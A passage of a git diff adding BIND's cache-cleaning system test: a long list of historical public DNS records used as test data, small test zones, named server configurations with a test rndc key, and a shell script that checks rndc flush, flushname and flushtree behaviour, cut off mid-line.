+ATLWEB1 IN A 207.153.72.194 +$ORIGIN hill.com. +SYRUP IN A 208.162.106.3 +$ORIGIN garmontusa.com. +mail IN A 64.30.8.178 +$ORIGIN VIX.com. +NS-EXT IN A 204.152.184.64 +ns-int IN A 204.152.184.65 +$ORIGIN rc.VIX.com. +db IN A 204.152.187.21 +$ORIGIN SOVAM.com. +NS IN A 194.67.2.97 +$ORIGIN IOS.com. +NOC IN A 198.4.75.69 +$ORIGIN BOSTON.juno.com. +NS IN A 64.136.25.53 +$ORIGIN JERSEY.juno.com. +NS IN A 64.136.17.178 +$ORIGIN NYC.juno.com. +NS IN A 205.231.108.1 +$ORIGIN MEITCA.com. +NS1 IN A 137.203.5.1 +$ORIGIN glaxowellcome.com. +firewall3 IN A 192.58.204.207 +firewall1 IN A 192.58.204.204 +NS IN A 192.58.204.113 +$ORIGIN EPILOGUE.com. +QUERN IN A 128.224.1.136 +$ORIGIN CLASSIFIEDMONSTER.com. +NS1 IN A 216.254.54.22 +$ORIGIN nova-data.com. +mail IN A 12.16.110.35 +$ORIGIN corning.com. +GATEKEEPER IN A 149.42.1.2 +$ORIGIN a1.YIMG.com. +us IN CNAME a32.g.a.yimg.com. +$ORIGIN i1.YIMG.com. +us IN CNAME a1.g.a.yimg.com. +$ORIGIN nc.us.IBM.com. +e24 IN A 32.97.136.230 +e22 IN A 32.97.136.228 +e23 IN A 32.97.136.229 +e21 IN A 32.97.136.227 +$ORIGIN co.us.IBM.com. +e34 IN A 32.97.110.132 +e32 IN A 32.97.110.130 +e33 IN A 32.97.110.131 +e31 IN A 32.97.110.129 +$ORIGIN ny.us.IBM.com. +e4 IN A 32.97.182.104 +e2 IN A 32.97.182.102 +e3 IN A 32.97.182.103 +e1 IN A 32.97.182.101 +$ORIGIN AUSTIN.IBM.com. +NS IN A 192.35.232.34 +$ORIGIN ZURICH.IBM.com. +INTERNET-SERVER IN A 195.212.119.252 +$ORIGIN ALMADEN.IBM.com. +NS IN A 198.4.83.35 +$ORIGIN ERS.IBM.com. +NS IN A 204.146.173.35 +$ORIGIN WATSON.IBM.com. +NS IN A 198.81.209.2 +$ORIGIN DCCSERVER.com. +GODFEVER IN A 208.137.22.6 +$ORIGIN SUN.com. +saturn IN A 192.9.25.2 +venus IN A 192.9.25.5 +east IN MX 40 mars.sun.com. + IN MX 40 mondzo.sun.com. + IN MX 5 venus.sun.com. + IN MX 5 lukla.sun.com. + IN MX 5 saturn.sun.com. + IN MX 5 patan.sun.com. + IN MX 15 mercury.sun.com. +mondzo IN A 192.18.100.1 +lukla IN A 192.18.98.31 +NS-BRM IN A 192.18.99.5 +ns-os IN A 192.9.9.6 +patan IN A 192.18.98.43 +mars IN A 192.9.22.1 +mercury IN A 192.9.25.1 +NS IN A 192.9.9.3 +$ORIGIN pr.SUN.com. +ns1 IN A 192.18.16.2 +$ORIGIN eu.SUN.com. +ns1 IN A 192.18.240.8 +$ORIGIN USEC.SUN.com. +NS IN A 192.9.48.3 +$ORIGIN PSHIFT.com. +ns2 IN A 208.153.85.21 +NS1 IN A 208.153.85.20 +$ORIGIN mobydark.com. +ns1 IN A 216.13.76.21 +$ORIGIN compuserve.com. +DUB-NAME-SVC-1 IN A 149.174.213.5 +ARL-NAME-SVC-1 IN A 149.174.211.5 +$ORIGIN NS.cs.com. +DNS-02 IN A 205.188.157.235 +DNS-01 IN A 152.163.159.235 +$ORIGIN pcode.com. +ns1 IN A 216.15.192.135 +$ORIGIN AVENUEA.com. +EX2-DNS0 IN A 216.34.88.20 +SEA2DNS IN A 63.251.8.150 +$ORIGIN PHOTOTRUST.com. +Filer IN A 64.85.86.172 +NS02 IN A 64.85.86.142 +www IN A 64.85.86.151 +NS01 IN A 64.85.86.141 +$ORIGIN GOOGLE.com. +HEDNS1 IN A 64.209.200.10 +helbdns IN A 64.209.200.252 +valbdns IN A 216.239.37.252 +exlbdns IN A 64.208.34.252 +sulbdns IN A 64.208.32.252 +NS IN A 209.185.108.134 +sjlbdns IN A 216.239.35.252 +NS2 IN A 209.185.108.135 +$ORIGIN ns0.com. +NS00 IN A 216.92.60.60 +ns0 IN A 209.197.64.1 +$ORIGIN best.com. +NS3 IN A 209.24.149.42 +mail2 IN A 206.184.139.12 + IN A 206.184.139.13 + IN A 206.184.139.16 + IN A 206.184.139.18 +mail3 IN A 206.184.139.12 + IN A 206.184.139.13 + IN A 206.184.139.16 + IN A 206.184.139.18 +mail4 IN A 206.184.139.12 + IN A 206.184.139.13 + IN A 206.184.139.16 + IN A 206.184.139.18 +NS1 IN A 209.24.149.41 +mail1 IN A 206.184.139.12 + IN A 206.184.139.13 + IN A 206.184.139.16 + IN A 206.184.139.18 +NS2 IN A 209.157.102.11 +$ORIGIN WESTOL.com. +NS IN A 63.93.137.4 +$ORIGIN ilovedomain.com. +ns IN A 211.175.164.170 +$ORIGIN symquest.com. +Quest-7 IN A 64.69.102.131 +$ORIGIN QUEST-NET.com. +mail IN A 207.140.30.11 +NS2 IN A 207.140.30.13 +NS1 IN A 207.140.30.11 +$ORIGIN cavebear.com. +p2 IN A 199.184.128.35 +npax IN A 192.203.17.71 +$ORIGIN cacheware.com. +ns1 IN A 64.221.210.242 +$ORIGIN Algebra.com. +ns3 IN A 216.254.54.22 +ns1 IN A 160.79.196.177 +NS5 IN A 208.233.99.161 +$ORIGIN gmcr.com. +gateway1 IN A 12.34.108.130 +$ORIGIN YAHOO.com. +NS1 IN A 204.71.200.33 +$ORIGIN EUROPE.YAHOO.com. +NS3 IN A 217.12.4.71 +$ORIGIN DCX.YAHOO.com. +NS5 IN A 216.32.74.10 +$ORIGIN GRANITECANYON.com. +NS2 IN A 204.1.217.148 +NS1 IN A 205.166.226.38 +$ORIGIN costorf.com. +localhost IN A 127.0.0.1 +www IN CNAME costorf.com. +$ORIGIN PSG.com. +RAIN IN A 147.28.0.34 +RIP IN A 147.28.0.39 +$ORIGIN vt.highmeadow.com. +hm6 IN A 207.136.209.6 +$ORIGIN btinternet.com. +DNS2 IN A 194.73.73.94 +DNS1 IN A 194.73.73.95 +$ORIGIN INTERNET-TOOLS.com. +NS2 IN A 206.109.113.140 +NS IN A 208.239.1.2 +NS3 IN A 38.153.179.2 +$ORIGIN CADABRA.com. +NS2 IN A 209.157.194.109 +NS IN A 209.143.240.148 +$ORIGIN SLOWMOE.com. +NS2 IN A 137.118.8.50 +NS1 IN A 137.118.8.49 +$ORIGIN ZTNET.com. +NS2 IN A 63.211.17.252 +NS1 IN A 63.211.17.251 +$ORIGIN HOTWIRED.com. +NS2 IN A 209.185.151.6 +NS4 IN A 209.185.151.4 +NS1 IN A 216.32.228.8 +NS3 IN A 216.32.228.9 +$ORIGIN g-world.com. +NS1 IN A 216.26.39.10 +$ORIGIN alcatrazmedia.com. +ns1 IN A 167.160.132.2 +$ORIGIN MESSAGESECURE.com. +KYNSE02 IN A 216.142.252.201 +KYNSE01 IN A 216.142.252.199 +$ORIGIN HAITIWORLD.com. +APPSRV IN A 206.152.15.34 +NS IN A 206.152.15.33 +$ORIGIN NETSOL.com. +NS2 IN A 198.17.208.71 +RS0 IN A 216.168.224.206 +NS3 IN A 216.168.224.201 +NS1 IN A 216.168.224.200 +$ORIGIN cmates.com. +NS-AUTH2 IN A 208.23.213.3 +ns-auth1 IN A 208.23.213.2 +$ORIGIN skiinsurance.com. +mail IN A 207.136.205.152 +$ORIGIN GH.com. +AUSTIN IN A 196.3.64.1 +$ORIGIN DIGISERVE.com. +NS2 IN A 204.91.84.216 +NS1 IN A 151.196.69.5 +$ORIGIN map.com. +sgi1 IN A 204.71.19.20 +WORMHOLE IN A 204.71.19.10 +$ORIGIN SNS-UT.DEBIS.com. +NS2 IN A 53.122.2.10 +$ORIGIN SNS-FELB.DEBIS.com. +NS1 IN A 53.122.1.10 +$ORIGIN idx.com. +seaipsvcs IN A 172.22.64.42 +BOSDOC IN A 198.114.171.109 +drawbridge IN A 204.165.241.2 +IDXNMS IN A 204.165.242.7 +idx IN A 198.114.171.160 +isdev IN A 198.181.234.9 +bvtipsvcs IN A 198.114.172.50 +bosdns IN A 198.114.171.109 +bvtsweeper IN A 198.181.234.69 +$ORIGIN VERITAS.com. +NS IN A 204.177.156.38 +$ORIGIN BFG.com. +gateway2 IN A 166.102.214.66 +aisvt IN MX 0 gateway2.bfg.com. +GATEWAY IN A 131.187.253.2 +$ORIGIN sleepycat.com. +abyssinian IN A 199.103.241.218 +$ORIGIN cisco.com. +proxy6 IN A 203.41.198.245 +proxy9 IN A 192.135.250.71 +proxy1 IN A 192.31.7.88 +proxy2 IN A 192.31.7.89 +proxy3 IN A 192.31.7.90 +ns1 IN A 128.107.241.185 +NS2 IN A 192.135.250.69 +$ORIGIN TOAPLAN.com. +www IN A 216.42.31.169 +$ORIGIN INTUIT.com. +DNS1 IN A 208.157.255.4 +$ORIGIN REGEX.com. +NS1 IN A 202.152.12.227 +$ORIGIN DEC.com. +crl IN A 192.58.206.2 +ns IN A 204.123.2.42 +$ORIGIN PA.DEC.com. +UUCP-GW-2 IN A 16.1.0.19 +UUCP-GW-1 IN A 16.1.0.18 + IN A 204.123.2.18 +$ORIGIN LANDLORDS.com. +NS IN A 63.64.164.68 +$ORIGIN hometownbands.com. +www IN A 209.67.235.38 +$ORIGIN MSFT.AKADNS.com. +Z6 IN A 207.229.152.20 +Z2 IN A 32.96.80.17 +Z4 IN A 208.148.96.220 +Z7 IN A 213.161.66.158 +Z3 IN A 63.215.198.67 +Z1 IN A 216.32.118.104 +$ORIGIN smuggs.com. +mail IN A 209.67.230.71 +$ORIGIN OUTREMER.com. +MANTA IN A 213.16.1.106 +$ORIGIN hns.com. +HNS3 IN A 208.236.67.3 +$ORIGIN TRIVALLEY.com. +NS3 IN A 206.25.132.30 +$ORIGIN AI-R.com. +NS2 IN A 66.33.4.51 +NS1 IN A 66.33.0.143 +$ORIGIN ALCATEL.com. +NS IN A 192.160.6.91 +PRIMARY IN A 192.160.6.90 +$ORIGIN GENDYN.com. +NET2 IN A 204.60.171.9 +NET1 IN A 204.60.171.8 +$ORIGIN ONLINEPHOTOCONTEST.com. +www IN A 64.85.86.152 +$ORIGIN performancediver.com. +listserv IN A 216.34.185.155 +$ORIGIN rge.com. +gw IN A 157.225.178.11 +$ORIGIN NS.AOL.com. +DNS-02 IN A 205.188.157.232 +DNS-01 IN A 152.163.159.232 +$ORIGIN MANY-PATHS-ENERGY-ENHANCEMENT.com. +www IN A 66.33.4.50 +$ORIGIN IS.CHRYSLER.com. +FXCLPR02 IN A 204.189.94.37 +FXIOD01 IN A 204.189.94.70 +$ORIGIN TO.GD-ES.com. +NS IN A 199.107.240.66 +$ORIGIN GNAC.com. +ns2 IN A 209.182.195.77 +NS1 IN A 209.182.195.77 +$ORIGIN AKAMAI.com. +YA IN A 204.178.118.68 +ACCESS IN A 4.17.143.9 +YB IN A 204.212.232.16 +YC IN A 209.246.46.48 +YD IN A 209.189.112.39 +YE IN A 192.215.168.18 +YF IN A 216.32.118.14 +YG IN A 204.178.110.35 +YH IN A 128.11.61.225 +$ORIGIN QUICKEN.com. +DNS4 IN A 198.3.99.252 +DNS2 IN A 206.154.105.67 +news IN MX 10 mail1.emailpub.com. + IN MX 10 mail2.emailpub.com. + IN MX 10 mail3.emailpub.com. + IN MX 10 mail4.emailpub.com. + IN MX 10 mail5.emailpub.com. + IN MX 10 mail6.emailpub.com. + IN A 207.211.106.100 +DNS3 IN A 198.3.96.252 +DNS1 IN A 206.154.105.66 +$ORIGIN LUXNOC.com. +NS4 IN A 195.206.104.201 +NS2 IN A 195.206.105.102 +NS0 IN A 195.206.105.1 +NS5 IN A 195.206.104.211 +NS3 IN A 195.206.104.1 +NS1 IN A 195.206.105.101 +$ORIGIN MAGIC-MOMENTS.com. +NS1 IN A 195.224.53.80 +$ORIGIN ABAC.com. +NS2 IN A 216.55.144.4 +NS1 IN A 216.55.128.4 +$ORIGIN GOTO.com. +NS2 IN A 204.71.128.137 +NS1 IN A 206.132.152.241 +$ORIGIN WEBTRENDS.com. +NS2 IN A 63.88.212.11 +NS1 IN A 63.88.212.10 +$ORIGIN hotmail.com. +NS3 IN A 209.185.130.68 +NS1 IN A 216.200.206.140 +$ORIGIN MERCHANTWARE.com. +NS2 IN A 209.170.142.35 +$ORIGIN MERCURYCENTER.com. +cgi IN CNAME vh80167.vh8.infi.net. +$ORIGIN CARIBSURF.com. +COL2 IN A 205.214.192.202 +COL1 IN A 205.214.192.201 +$ORIGIN MAIL-LIST.com. +zip IN MX 20 sluice.mail-list.com. + IN MX 20 pipeline.mail-list.com. + IN MX 20 transport.mail-list.com. + IN MX 50 swifty.mail-list.com. + IN MX 50 velocity.mail-list.com. + IN MX 50 brisk.mail-list.com. + IN MX 5 zip.mail-list.com. +$ORIGIN NAVPOINT.com. +south IN A 207.106.42.12 +north IN A 207.106.42.10 +NS2 IN A 207.106.42.12 +NS IN A 207.106.42.10 +$ORIGIN verisign-grs.com. +ns2 IN A 198.41.3.108 +ns1 IN A 198.41.3.39 +$ORIGIN gdarm.com. +bvt-ext IN A 166.19.32.42 +$ORIGIN REDHAT.com. +NS1 IN A 216.148.218.250 +$ORIGIN SKYNETWEB.com. +NS2 IN A 208.231.1.35 +NS1 IN A 208.231.1.34 +$ORIGIN COIL.com. +BRONZE IN A 198.4.94.1 +$ORIGIN ZTX.COMPAQ.com. +NS1-PUBLIC IN A 161.114.1.204 +$ORIGIN ZMA.COMPAQ.com. +NS1-PUBLIC IN A 161.114.64.24 +$ORIGIN FOOL.com. +NS2 IN A 208.51.76.222 +NS1 IN A 208.241.66.222 +$ORIGIN retro.com. +www IN A 205.179.181.195 +gw IN A 205.179.181.194 +$ORIGIN NRSITE.com. +NS5 IN A 208.178.169.4 +NS7 IN A 206.41.20.3 +NS3 IN A 199.172.144.20 +$ORIGIN jerusalem-mail.com. +mail IN A 216.251.232.93 +$ORIGIN PAIR.com. +ns3 IN A 209.68.1.15 +NS1 IN A 209.68.1.11 +$ORIGIN GLOBALDNS.com. +NS1 IN A 206.253.214.11 +$ORIGIN tfm.com. +mailhost IN A 192.231.224.11 +mtbaker IN A 192.231.224.2 +NS2 IN A 208.236.160.42 +NS1 IN A 209.83.142.82 +NS IN A 192.231.224.1 +$ORIGIN bock.com. +NS2 IN A 64.30.29.4 +NS1 IN A 64.30.29.3 +$ORIGIN TARSUS.com. +MAIL IN A 208.130.9.252 +BEAR IN A 208.130.9.248 +$ORIGIN NETANET.com. +NS0 IN A 194.6.96.218 + IN A 195.172.127.72 +NS1 IN A 194.6.96.218 +$ORIGIN SEANET.com. +DNS2 IN A 199.181.164.2 +DNS3 IN A 199.181.164.3 +DNS1 IN A 199.181.164.1 +$ORIGIN INTERNETSHARE.com. +NS1 IN A 63.207.108.53 +$ORIGIN ALTAVISTA.com. +NS2 IN A 209.73.164.7 +NS3 IN A 209.73.176.204 +NS1 IN A 209.73.164.76 +$ORIGIN NOVELL.com. +NS IN A 137.65.1.1 +$ORIGIN SAIPAN.com. +NS2 IN A 202.128.28.2 +NS IN A 202.128.27.2 +$ORIGIN diebold.com. +eliot IN A 204.151.249.21 +ness IN A 208.228.181.21 +$ORIGIN WonderWorks.com. +mail IN A 192.203.206.67 +ice IN A 192.203.206.9 +$ORIGIN SIGNALZ.com. +NS IN A 209.67.230.71 +$ORIGIN GW.tislabs.com. +RELAY IN A 192.94.214.100 +$ORIGIN CAIS.com. +NS IN A 205.177.10.10 +$ORIGIN tesserae.com. +ns2 IN A 209.157.194.3 +NS IN A 209.157.194.2 +$ORIGIN NETPOLICY.com. +MINION IN A 207.87.121.66 +$ORIGIN wirbel.com. +enterprise IN A 194.231.54.2 +$ORIGIN fiberia.com. +webmail IN A 216.55.147.2 +$ORIGIN BAYAREA.com. +www IN CNAME vh80040.vh8.infi.net. +$ORIGIN CONNACTIVITY.com. +bparker IN A 206.34.200.200 +NS2 IN A 206.34.200.3 +CONNACTIVITY IN A 206.34.200.2 +$ORIGIN tifosi.com. +BK IN A 208.58.189.13 +daytona IN A 192.104.156.3 +$ORIGIN bucksnet.com. +gutenberg IN A 207.113.15.5 +$ORIGIN ivillage.com. +NS2 IN A 209.185.162.16 +NS1 IN A 209.185.162.15 +$ORIGIN codelocal.com. +ns1 IN A 216.15.192.130 +$ORIGIN NETFLIGHT.com. +DNS IN A 207.88.32.2 +$ORIGIN MERCHANTWARE.CON. +NS1 IN A 209.170.142.34 diff --git a/bin/tests/system/cacheclean/ns1/expire-test.db b/bin/tests/system/cacheclean/ns1/expire-test.db new file mode 100644 index 0000000..8085543 --- /dev/null +++ b/bin/tests/system/cacheclean/ns1/expire-test.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ IN SOA hostmaster.ns ns ( + 2011072900 + 600 + 600 + 1200 + 3600 + ) + NS ns +ns IN A 10.53.0.1 diff --git a/bin/tests/system/cacheclean/ns1/flushtest.db b/bin/tests/system/cacheclean/ns1/flushtest.db new file mode 100644 index 0000000..ac6b408 --- /dev/null +++ b/bin/tests/system/cacheclean/ns1/flushtest.db @@ -0,0 +1,44 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +$ORIGIN flushtest.example. +@ IN SOA flushtest.example. ns.flushtest.example. ( + 2011072900 + 600 + 600 + 1200 + 3600 + ) + NS ns +ns IN A 10.53.0.1 + +top1 IN TXT "text" +second1.top1 IN TXT "text" +third1.second1.top1 IN TXT "text" +third2.second1.top1 IN TXT "text" +second2.top1 IN TXT "text" +second3.top1 IN TXT "text" + +; top2 node is omitted for testing with an empty nonterminal +second1.top2 IN TXT "text" +second2.top2 IN TXT "text" +second3.top2 IN TXT "text" + +top3 IN TXT "text" +second1.top3 IN TXT "text" +third1.second1.top3 IN TXT "text" +third2.second1.top3 IN TXT "text" +; second2.top3 is omitted for testing with an empty nontermianl +third1.second2.top3 IN TXT "text" +third2.second2.top3 IN TXT "text" +second3.top3 IN TXT "text" + diff --git a/bin/tests/system/cacheclean/ns1/named.args b/bin/tests/system/cacheclean/ns1/named.args new file mode 100644 index 0000000..2ba9a14 --- /dev/null +++ b/bin/tests/system/cacheclean/ns1/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 1 -D cacheclean-ns1 -X named.lock -g -T maxcachesize=2097152 diff --git a/bin/tests/system/cacheclean/ns1/named.conf.in b/bin/tests/system/cacheclean/ns1/named.conf.in new file mode 100644 index 0000000..98d2b28 --- /dev/null +++ b/bin/tests/system/cacheclean/ns1/named.conf.in @@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; + check-integrity no; + minimal-responses no; +}; + +zone "." { + type primary; + file "example.db"; +}; + +zone "flushtest.example" { + type primary; + file "flushtest.db"; +}; + +zone "expire-test" { + type primary; + file "expire-test.db"; +}; diff --git a/bin/tests/system/cacheclean/ns2/named.args b/bin/tests/system/cacheclean/ns2/named.args new file mode 100644 index 0000000..1bcc5ea --- /dev/null +++ b/bin/tests/system/cacheclean/ns2/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 3 -D cacheclean-ns2 -X named.lock -g -T maxcachesize=2097152 diff --git a/bin/tests/system/cacheclean/ns2/named.conf.in b/bin/tests/system/cacheclean/ns2/named.conf.in new file mode 100644 index 0000000..554730e --- /dev/null +++ b/bin/tests/system/cacheclean/ns2/named.conf.in @@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + notify yes; + disable-empty-zone 127.IN-ADDR.ARPA; + recursion yes; + dnssec-validation yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "flushtest.example" { + type forward; + forwarders { 10.53.0.1; }; +}; + +zone "expire-test" { + type secondary; + primaries { 10.53.0.1; }; +}; diff --git a/bin/tests/system/cacheclean/setup.sh b/bin/tests/system/cacheclean/setup.sh new file mode 100644 index 0000000..36969b7 --- /dev/null +++ b/bin/tests/system/cacheclean/setup.sh @@ -0,0 +1,18 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf diff --git a/bin/tests/system/cacheclean/tests.sh b/bin/tests/system/cacheclean/tests.sh new file mode 100755 index 0000000..033caf0 --- /dev/null +++ b/bin/tests/system/cacheclean/tests.sh @@ -0,0 +1,268 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +RNDCOPTS="-c ../common/rndc.conf -s 10.53.0.2 -p ${CONTROLPORT}" +DIGOPTS="+nosea +nocomm +nocmd +noquest +noadd +noauth +nocomm \ + +nostat @10.53.0.2 -p ${PORT}" + +# fill the cache with nodes from flushtest.example zone +load_cache () { + # empty all existing cache data + $RNDC $RNDCOPTS flush + + # load the positive cache entries + $DIG $DIGOPTS -f - << EOF > /dev/null 2>&1 +txt top1.flushtest.example +txt second1.top1.flushtest.example +txt third1.second1.top1.flushtest.example +txt third2.second1.top1.flushtest.example +txt second2.top1.flushtest.example +txt second3.top1.flushtest.example +txt second1.top2.flushtest.example +txt second2.top2.flushtest.example +txt second3.top2.flushtest.example +txt top3.flushtest.example +txt second1.top3.flushtest.example +txt third1.second1.top3.flushtest.example +txt third2.second1.top3.flushtest.example +txt third1.second2.top3.flushtest.example +txt third2.second2.top3.flushtest.example +txt second3.top3.flushtest.example +EOF + + # load the negative cache entries + # nxrrset: + $DIG $DIGOPTS a third1.second1.top1.flushtest.example > /dev/null + # nxdomain: + $DIG $DIGOPTS txt top4.flushtest.example > /dev/null + # empty nonterminal: + $DIG $DIGOPTS txt second2.top3.flushtest.example > /dev/null + + # sleep 2 seconds ensure the TTLs will be lower on cached data + sleep 2 +} + +dump_cache () { + rndc_dumpdb ns2 -cache _default +} + +clear_cache () { + $RNDC $RNDCOPTS flush +} + +in_cache () { + ttl=`$DIG $DIGOPTS "$@" | awk '{print $2}'` + [ -z "$ttl" ] && { + ttl=`$DIG $DIGOPTS +noanswer +auth "$@" | awk '{print $2}'` + [ "$ttl" -ge 3599 ] && return 1 + return 0 + } + [ "$ttl" -ge 3599 ] && return 1 + return 0 +} + +# Extract records at and below name "$1" from the cache dump in file "$2". +filter_tree () { + tree="$1" + file="$2" + perl -n -e ' + next if /^;/; + if (/'"$tree"'/ || (/^\t/ && $print)) { + $print = 1; + } else { + $print = 0; + } + print if $print; + ' "$file" +} + +n=`expr $n + 1` +echo_i "check correctness of routine cache cleaning ($n)" +$DIG $DIGOPTS +tcp +keepopen -b 10.53.0.7 -f dig.batch > dig.out.ns2 || status=1 + +digcomp --lc dig.out.ns2 knowngood.dig.out || status=1 + +n=`expr $n + 1` +echo_i "only one tcp socket was used ($n)" +tcpclients=`awk '$3 == "client" && $5 ~ /10.53.0.7#[0-9]*:/ {print $5}' ns2/named.run | sort | uniq -c | wc -l` + +test $tcpclients -eq 1 || { status=1; echo_i "failed"; } + +n=`expr $n + 1` +echo_i "reset and check that records are correctly cached initially ($n)" +ret=0 +load_cache +dump_cache +nrecords=`filter_tree flushtest.example ns2/named_dump.db.test$n | grep -E '(TXT|ANY)' | wc -l` +[ $nrecords -eq 18 ] || { ret=1; echo_i "found $nrecords records expected 18"; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check flushing of the full cache ($n)" +ret=0 +clear_cache +dump_cache +nrecords=`filter_tree flushtest.example ns2/named_dump.db.test$n | wc -l` +[ $nrecords -eq 0 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check flushing of individual nodes (interior node) ($n)" +ret=0 +clear_cache +load_cache +# interior node +in_cache txt top1.flushtest.example || ret=1 +$RNDC $RNDCOPTS flushname top1.flushtest.example +in_cache txt top1.flushtest.example && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check flushing of individual nodes (leaf node, under the interior node) ($n)" +ret=0 +# leaf node, under the interior node (should still exist) +in_cache txt third2.second1.top1.flushtest.example || ret=1 +$RNDC $RNDCOPTS flushname third2.second1.top1.flushtest.example +in_cache txt third2.second1.top1.flushtest.example && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check flushing of individual nodes (another leaf node, with both positive and negative cache entries) ($n)" +ret=0 +# another leaf node, with both positive and negative cache entries +in_cache a third1.second1.top1.flushtest.example || ret=1 +in_cache txt third1.second1.top1.flushtest.example || ret=1 +$RNDC $RNDCOPTS flushname third1.second1.top1.flushtest.example +in_cache a third1.second1.top1.flushtest.example && ret=1 +in_cache txt third1.second1.top1.flushtest.example && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check flushing a nonexistent name ($n)" +ret=0 +$RNDC $RNDCOPTS flushname fake.flushtest.example || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check flushing of namespaces ($n)" +ret=0 +clear_cache +load_cache +# flushing leaf node should leave the interior node: +in_cache txt third1.second1.top1.flushtest.example || ret=1 +in_cache txt top1.flushtest.example || ret=1 +$RNDC $RNDCOPTS flushtree third1.second1.top1.flushtest.example +in_cache txt third1.second1.top1.flushtest.example && ret=1 +in_cache txt top1.flushtest.example || ret=1 +in_cache txt second1.top1.flushtest.example || ret=1 +in_cache txt third2.second1.top1.flushtest.example || ret=1 +$RNDC $RNDCOPTS flushtree second1.top1.flushtest.example +in_cache txt top1.flushtest.example || ret=1 +in_cache txt second1.top1.flushtest.example && ret=1 +in_cache txt third2.second1.top1.flushtest.example && ret=1 + +# flushing from an empty node should still remove all its children +in_cache txt second1.top2.flushtest.example || ret=1 +$RNDC $RNDCOPTS flushtree top2.flushtest.example +in_cache txt second1.top2.flushtest.example && ret=1 +in_cache txt second2.top2.flushtest.example && ret=1 +in_cache txt second3.top2.flushtest.example && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check flushing a nonexistent namespace ($n)" +ret=0 +$RNDC $RNDCOPTS flushtree fake.flushtest.example || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check the number of cached records remaining ($n)" +ret=0 +dump_cache +nrecords=`filter_tree flushtest.example ns2/named_dump.db.test$n | grep -v '^;' | grep -E '(TXT|ANY)' | wc -l` +[ $nrecords -eq 17 ] || { ret=1; echo_i "found $nrecords records expected 17"; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check the check that flushname of a partial match works ($n)" +ret=0 +in_cache txt second2.top1.flushtest.example || ret=1 +$RNDC $RNDCOPTS flushtree example +in_cache txt second2.top1.flushtest.example && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check the number of cached records remaining ($n)" +ret=0 +dump_cache +nrecords=`filter_tree 